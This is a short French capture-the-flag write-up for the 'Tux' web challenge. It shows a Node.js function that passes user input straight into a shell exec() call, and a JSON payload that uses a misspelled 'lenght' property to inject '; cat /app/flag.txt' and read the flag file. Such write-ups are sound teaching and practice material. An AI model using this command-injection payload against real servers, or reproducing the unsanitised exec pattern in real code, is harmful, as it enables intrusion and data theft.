Tux (EASY)

Auteur(s):

Hokanosekai

Catégorie:

Web

Description:

Des étudiants ont créé un site web à l'effigie de notre cher Tux. Cependant, ils ont commis une erreur... Déccouvrez la !

```
Note: Le flag se situe dans /app/flag.txt
```

https://tux.univhackon.fr

Tux.zip

Flag UHOCTF{Fake_flag}

Solution

On commence donc par télécharger le fichier zip puis on l'extraie. En l'ouvrant on trouve le code source du site web.

Après une rapide analyse on comprend que la vulnérabilité se situe dans la fonction execCowSay qui permet d"xécuter une commande sur le serveur.

```
function execCowSay(defaultLength) {
    return new Promise((resolve, reject) => {
        exec(`cowsay -f tux ${defaultLength}`, (error, stdout, stderr)

=> {
        console.log(stdout, stderr, error)
        if (error) reject(error);
        resolve(stdout? stdout : stderr);
    });
});
}
```

Si l'on regarde le endpoint POST /generate, on voit une faute de frappe sur la variable value. Nous avons donc trouvé notre point d'entrée.

```
newCow = new Tux(null, value.lenght)
```

PROF

Length est mal orthographié en lenght

Nous allons donc pouvoir envoyer un objet JSON avec la propriété lenght.

```
{
    "value": {
      "length": 155,
      "lenght": "2 > /dev/null; cat /app/flag.txt"
    }
}
```

Maintenant on peut envoyer notre requête avec curl.

On obtient donc le flag.

Flag UHOCTF{Un_M4nch07_n'3s7_p4s_un_P1n90u1n}